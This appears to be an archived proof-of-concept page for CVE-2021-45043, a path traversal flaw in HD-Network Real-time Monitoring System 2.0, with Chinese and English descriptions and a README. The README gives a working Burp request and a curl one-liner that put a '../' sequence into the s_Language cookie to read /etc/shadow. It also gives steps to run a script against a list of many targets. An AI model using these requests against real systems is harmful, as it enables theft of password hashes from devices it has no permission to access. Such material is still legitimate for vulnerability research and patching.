CVE-2021-45043 PoC — UpdateStar HD-Network Real-time Monitoring System 路径遍历漏洞

Source

https://github.com/crypt0g30rgy/cve-2021-45043

Associated Vulnerability

Title:UpdateStar HD-Network Real-time Monitoring System 路径遍历漏洞 (CVE-2021-45043)
Description:UpdateStar HD-Network Real-time Monitoring System是德国UpdateStar公司的一个高清网络实时监控系统。 UpdateStar HD-Network Real-time Monitoring System 2.0 存在安全漏洞，该漏洞允许攻击者通过/language/lang s_Language参数进行../目录遍历攻击，从而读取/etc/shadow。

Description

HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.

Readme

# cve-2021-45043
HD-Network Real-time Monitoring System 2.0 allows ../ directory traversal to read /etc/shadow via the /language/lang s_Language parameter.

# initial post
https://cyberguy0xd1.medium.com/my-cve-2021-45043-lfi-write-up-441dad30dd7f

# exploiting via burp 
GET /language/lang HTTP/1.1
Host: IP.target
Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow

# exploiting via one liner 
curl -k -s -H "Cookie: s_Language=../../../../../../../../../../../../../../etc/shadow" -X GET http://IP.target/language/lang

# exploiting mass targets
git clone https://github.com/g30rgyth3d4rk/cve-2021-45043.git

cd cve-2021-45043/

chmod +x script.sh

./script.sh targets.txt

File Snapshot


 [4.0K]  /data/pocs/361311f81b94f95ef50149bac627cef84f86b432
├── [ 697]  README.md
└── [ 219]  script.sh

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!